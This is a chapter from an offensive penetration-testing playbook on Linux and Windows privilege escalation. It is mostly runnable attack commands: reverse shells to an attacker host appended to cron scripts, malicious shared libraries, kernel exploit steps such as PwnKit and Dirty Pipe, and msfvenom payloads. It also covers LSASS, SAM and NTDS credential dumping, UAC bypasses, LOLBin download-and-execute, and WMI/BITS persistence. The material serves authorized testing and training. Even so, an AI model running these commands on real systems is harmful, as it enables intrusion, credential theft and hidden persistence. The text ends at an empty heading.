Chapter 5: Privilege Escalation — Linux & Windows¶
Tags: #privesc #linux-privesc #windows-privesc #linpeas #winpeas #suid #sudo-abuse #seimpersonate #token-impersonation #dll-hijacking #kernel-exploit #uac-bypass #service-misconfig
Overview¶
Privilege escalation is the process of moving from an unprivileged foothold to root (Linux) or SYSTEM/local admin (Windows). The same principle applies to both OS: find something running with elevated privileges that you can influence. This chapter is split into Linux and Windows but shares the same structural approach — automated scan first, manual confirmation second, exploit third.
Master Decision Tree¶
You have a non-privileged shell. Which OS?
│
├── LINUX → § L1: Automated Scan (LinPEAS)
│ → § L2: Sudo / SUID / Capabilities
│ → § L3: Writable Scripts & Cron
│ → § L4: Shared Object & Python Hijacking
│ → § L5: Container Escape (LXD/Docker)
│ → § L6: Kernel Exploits
│ → § L7: NFS no_root_squash
│
└── WINDOWS → § W1: Automated Scan (WinPEAS / PowerUp)
→ § W2: Token Privileges (SeImpersonate etc.)
→ § W3: Service Misconfigurations
→ § W4: DLL Hijacking
→ § W5: AlwaysInstallElevated (MSI)
→ § W6: Registry & File Permission Weaknesses
→ § W7: UAC Bypass
→ § W8: Kernel / Patch Exploits
→ § W9: Third-Party Service Exploits (Remote Mouse CVE-2022-3174)
→ § W10: Server Operators / Backup Operators group → service binary abuse
→ § W11: SeBackupPrivilege → SAM/SYSTEM/NTDS dump
After achieving root/SYSTEM:
→ Return to Chapter 4 §5 (credential extraction) if not already done
→ Then Chapter 6 (pivot) or Chapter 7 (AD)
PART A: LINUX PRIVILEGE ESCALATION¶
L1. Automated Enumeration (Run First)¶
Info
Run LinPEAS before doing anything manual. It will flag 80% of what you need in under 60 seconds. Read the output top-to-bottom — it color-codes critical findings in red/yellow.
# Download and run LinPEAS (if HTTP server running on attacker)
curl http://<ATTACKER_IP>:<PORT>/linpeas.sh | bash
# Or transfer and run
wget http://<ATTACKER_IP>:<PORT>/linpeas.sh -O /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh 2>/dev/null | tee /tmp/lp_out.txt
# pspy — watch processes without root (find cron/scheduled scripts)
wget http://<ATTACKER_IP>:<PORT>/pspy64 -O /tmp/pspy
chmod +x /tmp/pspy
/tmp/pspy
L2. Sudo, SUID & Capabilities¶
Decision Tree¶
Check sudo:
│ sudo -l
│ ├── Can run any command as root with no password?
│ │ └── sudo /bin/bash → instant root
│ ├── Can run a specific binary as root?
│ │ └── Check GTFOBins for that binary
│ └── Can run with LD_PRELOAD in env_keep?
│ └── § L2c: LD_PRELOAD exploit
Check SUID:
│ find / -perm -4000 2>/dev/null
│ ├── Non-standard binary (not /bin/su, /usr/bin/passwd etc.)?
│ │ └── Run it, check strings/ltrace/strace, check GTFOBins
│ └── Custom SUID binary with RUNPATH?
│ └── § L2e: Shared Object Hijacking
Check capabilities:
│ getcap -r / 2>/dev/null
│ ├── cap_setuid on a binary?
│ │ └── Use that binary to set UID 0
│ └── cap_dac_override?
│ └── Can write to protected files (edit /etc/passwd or sudoers)
2a. sudo -l Quick Wins¶
sudo -l
# If you see (ALL : ALL) NOPASSWD:
sudo /bin/bash
sudo su -
# If you see specific binary — check GTFOBins:
# https://gtfobins.github.io
# Example: sudo vim → :!bash inside vim
# Example: sudo less → !/bin/bash inside less
# Example: sudo find → sudo find /etc -exec /bin/bash \; -quit
# Example: sudo python3 → sudo python3 -c 'import os; os.execl("/bin/sh","sh")'
# Example: sudo awk → sudo awk 'BEGIN {system("/bin/bash")}'
2b. CVE-2019-14287 — Sudo UID Bypass¶
# Check sudo version
sudo --version # Vulnerable: < 1.8.28
# Check if sudoers has "(u1, !root)" or similar user restriction
sudo -l
# Exploit: -1 converts to UID 0 (root)
sudo -u#-1 id
sudo -u#-1 /bin/bash
2c. LD_PRELOAD Exploit (env_keep)¶
# Check output of sudo -l for: env_keep+=LD_PRELOAD
# Create malicious shared library:
cat > /tmp/pe.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/pe.so /tmp/pe.c -nostartfiles
# Run any allowed sudo binary with the preload
sudo LD_PRELOAD=/tmp/pe.so <ALLOWED_BINARY>
2d. SUID Binary Enumeration¶
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Identify non-standard ones (compare against known list)
find / -perm -4000 -type f 2>/dev/null | grep -v "/bin\|/sbin\|/usr/bin\|/usr/sbin\|/usr/lib"
# Trace what a SUID binary calls
strings /path/to/suid # Look for relative binary names (e.g., "cat" not "/bin/cat")
ltrace /path/to/suid # Library calls
strace -v -f -e trace=execve /path/to/suid 2>&1 | grep exec # exec calls
# If SUID binary calls a relative command (e.g., "service", "cat"):
# → PATH hijacking (see L4c below)
2e. Capabilities Abuse¶
# Find capabilities on binaries
getcap -r / 2>/dev/null
# cap_setuid on Python/Perl/Ruby → instant root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_override on vim/nano/tee/etc → write any file
# Edit /etc/passwd — remove root password hash:
echo 'root::0:0:root:/root:/bin/bash' > /tmp/passwd_new
# Replace with tee if it has cap_dac_override:
tee /etc/passwd < /tmp/passwd_new
su root # no password needed
# cap_dac_read_search → read any file
# Use to read /etc/shadow, /root/.ssh/id_rsa
L3. Cron Jobs & Writable Scripts¶
Decision Tree¶
Watch running processes with pspy (or check /etc/crontab):
│
├── Cron runs a script you can write to?
│ └── Append reverse shell to script → wait for cron execution
│
├── Cron runs "tar" or similar with wildcard (*)?
│ └── § L3b: Wildcard injection
│
└── Script runs commands from PATH without full path?
└── § L4c: PATH hijacking
3a. Script Modification (Cron/Startup)¶
# Find writable scripts that run as root
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/
crontab -l 2>/dev/null
# Watch for processes spawned by root
/tmp/pspy # or pspy64
# If script is writable:
ls -la /path/to/script.sh
echo 'bash -i >& /dev/tcp/<ATTACKER_IP>/<LPORT> 0>&1' >> /path/to/script.sh
# Wait for cron execution — catch shell on attacker:
nc -lvnp <LPORT>
3b. Wildcard Injection (tar/rsync)¶
# Cron runs: tar czf /tmp/backup.tar.gz /home/user/*
# Exploit:
echo 'echo "<USER> ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > /home/user/root.sh
chmod +x /home/user/root.sh
echo "" > "/home/user/--checkpoint-action=exec=sh root.sh"
echo "" > "/home/user/--checkpoint=1"
# Wait for tar to run — it interprets filenames as arguments
sudo -l # New sudoers entry appears
sudo su -
L4. Shared Library & Python Hijacking¶
4a. Shared Object RUNPATH Hijacking¶
# Find SUID binary with RUNPATH pointing to writable dir
find / -perm -4000 -type f 2>/dev/null
readelf -d /path/to/suid | grep "RUNPATH\|RPATH"
ldd /path/to/suid # Check what libraries it loads and from where
# If RUNPATH is a writable directory:
cat > /tmp/hijack.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void hijacked_function() __attribute__((constructor));
void hijacked_function() {
setuid(0);
setgid(0);
system("/bin/bash -p");
}
EOF
gcc -shared -fPIC -nostartfiles -o /writable/dir/libname.so /tmp/hijack.c
/path/to/suid # Executes with SUID privileges, loads our library
4b. Python Library Hijacking¶
# Check if a Python script runs as root (sudo or cron)
sudo -l | grep python
# Check Python path order
python3 -c 'import sys; print("\n".join(sys.path))'
# If a writable directory is earlier in the path than the legit library:
# Create a file named the same as the imported module in that directory
# Example: script imports "psutil"
# If /tmp is before /usr/lib in sys.path and /tmp is writable:
cat > /tmp/psutil.py << 'EOF'
import os
os.system('/bin/bash -p')
EOF
sudo /usr/bin/python3 /path/to/script.py
# → Imports our malicious psutil.py first
4c. PATH Hijacking (SUID or Sudo with Relative Commands)¶
# SUID binary calls a command without full path (e.g., "service" instead of "/usr/sbin/service")
strings /path/to/suid | grep -v "^/" # Find relative commands
# Create malicious binary with same name
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
# Prepend our directory to PATH
export PATH=/tmp:$PATH
# Run the SUID binary
/path/to/suid
# Executes /tmp/service as root → gives us root shell
L5. Container Escape (LXD / Docker)¶
5a. LXD Group Abuse¶
# Check if in lxd group
id | grep lxd
# If yes:
lxd init --auto 2>/dev/null || true
# Import a minimal Alpine image (transfer to target first)
lxc image import /tmp/alpine.tar.gz --alias myimage 2>/dev/null
# Create privileged container and mount host root
lxc init myimage c1 -c security.privileged=true
lxc config device add c1 mydevice disk source=/ path=/mnt/root recursive=true
lxc start c1
lxc exec c1 /bin/sh
# Now inside container with host root at /mnt/root
cat /mnt/root/etc/shadow # Steal hashes
cat /mnt/root/root/.ssh/id_rsa # Steal SSH key
echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /mnt/root/etc/sudoers # Add sudoers
5b. Docker Group Abuse¶
# Check if in docker group
id | grep docker
# Mount host root into container
docker run -v /:/mnt --rm -it ubuntu:latest bash
# Full access to host filesystem as root inside container
cat /mnt/etc/shadow
chroot /mnt bash # Become root on the host filesystem
L6. Kernel Exploits¶
Warning
Kernel exploits can panic/crash the system. Always check the kernel version first, search for a matching PoC, read the PoC before running it, and have a backup plan if the system goes down.
# Get exact kernel version
uname -r
uname -a
cat /etc/os-release
# Search for public exploits:
# searchsploit linux kernel <VERSION>
# site:exploit-db.com linux kernel <VERSION>
CVE Quick Reference¶
| CVE | Affected | Notes |
|---|---|---|
| CVE-2016-5195 | Dirty COW — kernel 2.x-4.8.3 | Race condition; stable PoCs available |
| CVE-2021-4034 | PwnKit — polkit ≤ 0.120 | pkexec memory corruption; very reliable |
| CVE-2022-0847 | Dirty Pipe — kernel 5.8-5.17 | Overwrite read-only files; very clean |
| CVE-2021-22555 | Netfilter — kernel 2.6-5.11 | 32-bit kernel only |
| CVE-2022-25636 | Netfilter — kernel 5.4-5.6.10 | heap OOB |
| CVE-2023-32233 | Netfilter — kernel < 6.3.1 | UAF in nf_tables |
CVE-2021-4034 (PwnKit — most reliable)¶
# Check polkit version
dpkg -l policykit-1 2>/dev/null
rpm -qa polkit 2>/dev/null
# Get and compile PoC
wget http://<ATTACKER_IP>/CVE-2021-4034-poc.c -O /tmp/poc.c
gcc /tmp/poc.c -o /tmp/poc
/tmp/poc
# → drops root shell
CVE-2022-0847 (Dirty Pipe)¶
# Check kernel: 5.8 ≤ version < 5.17
uname -r
# Compile exploit
wget http://<ATTACKER_IP>/dirtypipe.c -O /tmp/dp.c
gcc /tmp/dp.c -o /tmp/dp
# Option 1: overwrite /etc/passwd to remove root password
/tmp/dp /etc/passwd 1 'root::0:0:root:/root:/bin/bash'
su root # no password needed
# Option 2: overwrite a SUID binary with a shell
/tmp/dp /usr/bin/su 1 '#!/bin/bash\nbash -p'
L7. NFS no_root_squash¶
# Check NFS exports (on target or remotely)
cat /etc/exports # Look for "no_root_squash"
showmount -e <TARGET_IP>
# Mount the share from attacker (as root)
sudo mount -t nfs <TARGET_IP>:/exported/path /mnt/nfs
# Create SUID shell in the share (as root on attacker → SUID carries to target)
sudo cp /bin/bash /mnt/nfs/bash_root
sudo chmod u+s /mnt/nfs/bash_root
# Execute on target
/path/to/mounted/bash_root -p # -p preserves SUID UID
# → root shell
PART B: WINDOWS PRIVILEGE ESCALATION¶
W1. Automated Enumeration (Run First)¶
# WinPEAS — most comprehensive (LOLBin alt: systeminfo + wmic + reg query — see § LOLBin Reference at end of chapter)
.\winPEASx64.exe | Tee-Object C:\Windows\Temp\winpeas.txt
# In-memory version
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/winPEAS.ps1')
# PowerUp — focused on service/registry misconfigs
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/PowerUp.ps1')
Invoke-AllChecks | Tee-Object C:\Windows\Temp\powerup.txt
# Quick manual check — key privesc indicators at a glance
whoami /priv
whoami /groups
systeminfo | findstr /B /C:"OS" /C:"Domain"
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\\windows\\" | findstr /i /v '\"'
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
W2. Token Privileges (Highest-Yield Windows Privesc)¶
Decision Tree¶
Check whoami /priv for enabled dangerous privileges:
│
├── SeImpersonatePrivilege ENABLED?
│ └── Almost always exploitable → § W2a
│
├── SeAssignPrimaryTokenPrivilege ENABLED?
│ └── Also leads to SYSTEM → § W2a (same tools apply)
│
├── SeDebugPrivilege ENABLED?
│ └── → § W2b (LSASS dump / inject into privileged processes)
│
├── SeBackupPrivilege ENABLED?
│ └── → Copy SAM/SYSTEM/NTDS.dit → offline hash extraction
│
├── SeRestorePrivilege ENABLED?
│ └── → Overwrite any file → replace a system binary
│
└── SeTakeOwnershipPrivilege ENABLED?
└── → Take ownership of any file → then grant yourself access
2a. SeImpersonatePrivilege — Token Impersonation¶
# PrintSpoofer (best for modern Windows Server 2019/Win10)
PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -c "powershell.exe" -i
# RoguePotato (Windows Server 2016/2019)
RoguePotato.exe -r <ATTACKER_IP> -e "cmd.exe" -l 9999
# JuicyPotato (Windows Server 2008-2016, older builds)
JuicyPotato.exe -l 9999 -p C:\Windows\System32\cmd.exe -t * -c "{4991d34b-80a1-4291-83b6-3328366b9097}"
# EfsPotato (another variant)
EfsPotato.exe "cmd.exe /c net localgroup administrators <USER> /add"
2b. SeDebugPrivilege — LSASS Dump / Process Injection¶
# Dump LSASS with ProcDump
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
# Load dump in Mimikatz (on attacker box) (LOLBin alt: comsvcs.dll MiniDump + reg save — see § LOLBin Reference)
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
2c. SeBackupPrivilege — SAM/NTDS Extraction¶
# Copy locked files using backup privilege
robocopy C:\Windows\System32\config C:\Windows\Temp SAM SYSTEM /b
# If on DC:
robocopy C:\Windows\NTDS C:\Windows\Temp NTDS.dit /b
# Extract hashes on attacker:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
W3. Service Misconfigurations¶
Decision Tree¶
Check for weak service permissions:
│
├── Unquoted service path with writable directory in path?
│ └── § W3a
│
├── Service binary writable by current user?
│ └── § W3b: Replace binary
│
├── Service registry key writable?
│ └── § W3c: Modify ImagePath
│
└── Service DLL missing or in writable location?
└── § W4: DLL Hijacking
3a. Unquoted Service Paths¶
# Find unquoted paths with spaces
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\" | findstr /i /v '\"'
# Example vulnerable path: C:\Program Files\My Service\service.exe
# Windows searches: C:\Program.exe → C:\Program Files\My.exe → actual binary
# If C:\Program Files\ is writable → drop C:\Program Files\My.exe
# Check write permissions on each directory in the path
icacls "C:\Program Files"
icacls "C:\Program Files\My Service"
# Create malicious payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f exe > "C:\Program Files\My.exe"
# Restart service
sc stop "ServiceName"
sc start "ServiceName"
3b. Writable Service Binary¶
# Check service binary permissions
sc qc <SERVICE_NAME> # Get binary path
icacls "C:\path\to\service.exe"
# If writable by current user:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f exe > C:\Windows\Temp\evil.exe
copy /Y C:\Windows\Temp\evil.exe "C:\path\to\service.exe"
# Or simpler — add admin user via service:
sc config <SERVICE_NAME> binPath= "cmd /c net localgroup administrators <USER> /add"
sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>
3c. Weak Service Registry ACL¶
# Check registry permissions on services
# Use Sysinternals accesschk:
accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services
# If current user can write to a service's registry key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<SERVICE>" /v ImagePath /t REG_SZ /d "C:\Windows\Temp\evil.exe" /f
sc stop <SERVICE>
sc start <SERVICE>
W4. DLL Hijacking¶
# Find services/applications that load DLLs from user-writable paths
# Process Monitor (ProcMon) — filter for "NAME NOT FOUND" + ".dll"
# Look for: DLL search order — application dir → system32 → PATH directories
# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f dll -o <MISSING_DLL_NAME>.dll
# Place in the directory the application searches first
copy evil.dll "C:\path\that\is\searched\first\target.dll"
# Wait for application/service restart, or trigger restart:
sc stop <SERVICE>
sc start <SERVICE>
W5. AlwaysInstallElevated (MSI as SYSTEM)¶
# Check if both registry keys are set to 1
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If BOTH return 0x1:
# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f msi -o evil.msi
# Execute (runs as SYSTEM)
msiexec /i evil.msi /qn
W6. Weak File & Registry Permissions¶
6a. Scheduled Tasks with Writable Scripts¶
# List scheduled tasks with run-as SYSTEM or higher
schtasks /query /fo LIST /v | findstr /i "task name\|run as user\|task to run"
# Find the task's script/binary
schtasks /query /fo LIST /v /tn "<TASK_NAME>"
# Check if you can write to it
icacls "C:\path\to\task\script.ps1"
# If writable — append payload
echo "net localgroup administrators <USER> /add" >> C:\path\to\task\script.ps1
# Or drop reverse shell:
echo "powershell -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://<ATTACKER_IP>/shell.ps1\")'" >> task.ps1
6b. Credential Files & Sensitive Configs¶
# Search for plaintext credentials in web configs
findstr /S /I "password" C:\inetpub\wwwroot\*.config
findstr /S /I "connectionString\|password\|pass\b" "C:\inetpub\wwwroot\web.config"
# Search all config files recursively
dir /S /B *.config *.ini *.xml 2>nul | findstr /V "windows\|system32\|winsx"
# Credential Manager
cmdkey /list
# Use saved credentials
runas /savecred /user:<DOMAIN>\<USER> "cmd.exe"
6c. SAM/SYSTEM Direct Access¶
# Check if SAM is readable (misconfigured permissions)
icacls C:\Windows\System32\config\SAM
# If BUILTIN\Users or EVERYONE has read access:
copy C:\Windows\System32\config\SAM C:\Windows\Temp\
copy C:\Windows\System32\config\SYSTEM C:\Windows\Temp\
# Parse on attacker:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
W7. UAC Bypass¶
Info
UAC bypass is needed when you have local admin credentials but UAC is filtering your token to medium integrity. These techniques elevate to high integrity without a UAC prompt.
7a. Check UAC Status¶
# Check if UAC is on and current integrity level
whoami /groups | findstr "Mandatory Label"
# "Medium Mandatory Level" → UAC active, bypassing needed
# "High Mandatory Level" → already elevated
# Check UAC level (0=disabled, 1=prompt for creds, 2=prompt, 5=default)
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
7b. fodhelper.exe Registry Bypass (Windows 10)¶
# fodhelper.exe is a trusted auto-elevation binary
# It reads a registry key and executes it elevated
# Set malicious command in registry
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\System32\cmd.exe" /f
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
# Trigger
fodhelper.exe
# → Elevated cmd.exe spawns without UAC prompt
# Cleanup
REG DELETE HKCU\Software\Classes\ms-settings /f
7c. UACMe (Automated UAC Bypass Framework)¶
# Multiple bypass methods in one tool
Akagi64.exe 23 C:\Windows\System32\cmd.exe # Method 23 (many others available)
# Check github.com/hfiref0x/UACME for method numbers and compatibility
W8. Kernel & Patch Exploits¶
# Get OS version and installed hotfixes
systeminfo
wmic qfe list brief # Installed patches
# Use Windows Exploit Suggester
# On attacker (after copying systeminfo output):
python3 wes.py systeminfo.txt -i "Critical" --exploits-only
# Missing patches to watch for:
# MS17-010 (EternalBlue) — unpatched Windows 7/Server 2008
# MS16-032 — Secondary Logon service privesc
# MS15-051 — Win32k SID bypass
CVE-2021-1675 (PrintNightmare)¶
# Check if Print Spooler is running
Get-Service Spooler
# Import and run PrintNightmare PoC
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
# Verify new local admin user created
net localgroup administrators
W9. Third-Party Service Exploits — Remote Mouse CVE-2022-3174¶
Remote Mouse service (RemoteMouseService) runs as SYSTEM and listens on TCP ports 1978/1797/1980. CVE-2022-3174 allows unauthenticated RCE via crafted network packets. EDB-50047.
# Check if vulnerable service is running:
Get-Service RemoteMouseService
Get-Process | Where-Object {$_.Name -like "*mouse*"}
netstat -ano | findstr "1978\|1797\|1980"
# Compile C# exploit on target (when Python/network unavailable):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:C:\Users\Public\exploit.exe exploit.cs
# Grant execute permissions before running via webshell/limited shell:
icacls C:\Users\Public\exploit.exe /grant "Everyone:(RX)"
icacls C:\Users\Public\exploit.exe /grant "IIS APPPOOL\DefaultAppPool:(RX)"
W10. Server Operators Group Abuse → SYSTEM via Service Binary Hijack¶
Members of Server Operators can start/stop services and modify service binary paths on domain controllers. Combined with any stopped SYSTEM-level service, this gives arbitrary code execution as SYSTEM.
# Find stopped services running as SYSTEM (best targets):
Get-WmiObject Win32_Service | Where-Object {
$_.StartName -eq "LocalSystem" -and $_.State -eq "Stopped"
} | Select-Object Name, PathName | Format-Table -AutoSize
# Hijack service binary path to add local admin:
sc.exe config <ServiceName> binPath="cmd.exe /c net user hacker P@ssw0rd123! /add && net localgroup administrators hacker /add"
sc.exe stop <ServiceName>
sc.exe start <ServiceName>
# Verify:
net user hacker
# Then authenticate:
evil-winrm -i <DC_IP> -u hacker -p 'P@ssw0rd123!'
# Cleanup — restore original binary path after use:
sc.exe config <ServiceName> binPath="<ORIGINAL_PATH>"
W11. SeBackupPrivilege / SeRestorePrivilege → Credential Dump¶
SeBackupPrivilege allows reading any file bypassing ACLs. SeRestorePrivilege allows writing any file. Both are granted to Server Operators and Backup Operators by default.
# Verify privileges are enabled:
whoami /priv | findstr /i "backup\|restore"
# METHOD 1: Registry hive dump (fastest — no VSS required)
reg save HKLM\SAM C:\Windows\Temp\SAM /y
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM /y
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY /y # may fail — SAM+SYSTEM sufficient
# Download via evil-winrm:
download C:\Windows\Temp\SAM
download C:\Windows\Temp\SYSTEM
# Decrypt on Kali:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# METHOD 2: NTDS.dit via diskshadow (requires VSS service running)
# Write diskshadow script — must be separate lines, NOT backtick-concatenated
$lines = @(
"set context persistent nowriters",
"add volume c: alias mydrive",
"create",
"expose %mydrive% z:",
"exit"
)
$lines | Out-File -FilePath C:\Windows\Temp\shadow.txt -Encoding ASCII
diskshadow /s C:\Windows\Temp\shadow.txt
# Copy NTDS.dit using backup mode:
robocopy /b z:\Windows\NTDS C:\Windows\Temp ntds.dit
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM /y
# METHOD 3: ntdsutil IFM (alternative to diskshadow — creates own snapshot)
ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ifm" q q
# Output: C:\Windows\Temp\ifm\Active Directory\ntds.dit + registry\SYSTEM
# Decrypt on Kali:
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
W9. Credential Manager & Stored Passwords¶
# List stored credentials
cmdkey /list
# Use stored credential to run as another user
runas /savecred /user:<DOMAIN>\<USER> "cmd.exe"
# PowerShell — extract Windows Credential Vault
# (requires SessionGopher or Mimikatz)
# Mimikatz vault dump (LOLBin alt: comsvcs.dll MiniDump + reg save SAM/SYSTEM — see § LOLBin Reference)
mimikatz # vault::cred
mimikatz # vault::list
# Check for saved RDP credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
Routing After Privilege Escalation¶
Achieved root/SYSTEM?
│
├── YES
│ ├── Run credential extraction immediately (Chapter 4 §5)
│ │ → LSASS dump, SAM, shadow, LaZagne
│ │
│ ├── Check network topology (ip route / route print + arp -a)
│ │ ├── Other subnets visible? → Chapter 6: Pivoting
│ │ └── Domain-joined? → Chapter 7: Active Directory
│ │
│ └── On a domain controller already? → Chapter 7 §7 (DC post-exploitation)
│
└── NO — stuck?
├── Try a different technique from this chapter
├── Check for kernel exploit matching exact version
├── Re-run LinPEAS/WinPEAS and read output more carefully
└── Check for credentials in web configs → try those for su/runas
LOLBin Alternatives Reference (Built-in Windows Binaries)¶
Info
When you cannot drop external tools (AV/EDR blocking, strict AppLocker, no download capability), use these built-in Windows binaries. They achieve the same outcomes as dropped tools without introducing external artifacts.
LOLBin Decision Tree¶
Cannot drop/run external tool?
│
├── Need to transfer files? → certutil, bitsadmin, curl (Win10+), powershell DownloadFile
├── Need code execution? → mshta, wscript, cscript, regsvr32, rundll32, installutil
├── Need credential extraction? → comsvcs.dll MiniDump (no mimikatz), reg save (SAM/SYSTEM)
├── Need privilege escalation? → fodhelper (UAC), eventvwr, sdclt, computerdefaults
├── Need persistence? → schtasks, reg add RunKey, bitsadmin job, wmic /subscription
└── Need recon/enum? → wmic, netsh, ipconfig, systeminfo, tasklist, sc, reg query
File Operations¶
# File download — no external tools needed
certutil -urlcache -split -f http://<LHOST>/shell.exe C:\temp\shell.exe
bitsadmin /transfer job /download /priority high http://<LHOST>/shell.exe C:\temp\shell.exe
curl http://<LHOST>/shell.exe -o C:\temp\shell.exe # Windows 10+ only
powershell -c "(New-Object Net.WebClient).DownloadFile('http://<LHOST>/shell.exe','C:\temp\shell.exe')"
# File read (exfil small files via DNS or HTTP)
certutil -encode C:\Windows\repair\SAM encoded.b64 # base64 encode for exfil
type C:\Windows\repair\SAM | certutil -encode - # pipe to base64
# File copy with alternate data streams (hide payload)
type C:\temp\shell.exe > C:\Windows\Temp\legit.txt:payload.exe
wmic process call create "C:\Windows\Temp\legit.txt:payload.exe" # execute from ADS
Code Execution (AppLocker Bypass)¶
# mshta — executes HTA files (often whitelisted)
mshta http://<LHOST>/payload.hta
mshta vbscript:CreateObject("Wscript.Shell").Run("cmd /c calc",0,true)(window.close)
# regsvr32 — executes COM scriptlets (bypasses AppLocker by default)
regsvr32 /s /n /u /i:http://<LHOST>/payload.sct scrobj.dll
# rundll32 — executes DLL exports
rundll32.exe C:\temp\payload.dll,EntryPoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://<LHOST>/payload.sct")
# InstallUtil — .NET bypass, often not blocked
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\payload.exe
# wscript / cscript — execute JS or VBScript
wscript C:\temp\payload.js
cscript //E:jscript C:\temp\payload.txt # note: can override extension
Credential Extraction Without Mimikatz¶
# LSASS dump using built-in comsvcs.dll (no external tools)
tasklist | findstr lsass # get PID
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full
# SAM/SYSTEM hive copy using reg (requires SYSTEM or admin)
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SECURITY C:\temp\SECURITY
# Then: impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# Volume Shadow Copy — access NTDS.dit without VSS tools
wmic shadowcopy call create Volume='C:\' # create snapshot
vssadmin list shadows # find shadow path
cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
Privilege Escalation (LOLBin UAC Bypasses)¶
# fodhelper UAC bypass (Windows 10) — requires medium integrity
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /f
fodhelper.exe
# Cleanup: reg delete "HKCU\Software\Classes\ms-settings" /f
# eventvwr UAC bypass
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "cmd.exe" /f
eventvwr.exe
# Cleanup: reg delete "HKCU\Software\Classes\mscfile" /f
# sdclt bypass (Windows 10 1703+)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f
sdclt.exe
Persistence Without External Tools¶
# Scheduled task — pure LOLBin
schtasks /create /tn "WindowsHelper" /tr "cmd /c powershell -enc <B64>" /sc onlogon /ru SYSTEM /f
# BITS job — survives reboots, no dropped binary needed for trigger
bitsadmin /create /system BackgroundTask
bitsadmin /addfile BackgroundTask http://<LHOST>/callback.exe C:\Windows\Temp\wuapihost.exe
bitsadmin /SetNotifyCmdLine BackgroundTask C:\Windows\Temp\wuapihost.exe NULL
bitsadmin /resume BackgroundTask
# WMI event subscription (fileless persistence)
# Trigger: runs when system has been up > 60 seconds
wmic /namespace:"\\root\subscription" PATH __EventFilter CREATE Name="Filter",EventNameSpace="root\cimv2",QueryLanguage="WQL",Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Consumer",ExecutablePath="C:\Windows\Temp\wuapihost.exe",CommandLineTemplate="C:\Windows\Temp\wuapihost.exe"
wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filter\"",Consumer="CommandLineEventConsumer.Name=\"Consumer\""
Recon / Enumeration LOLBins¶
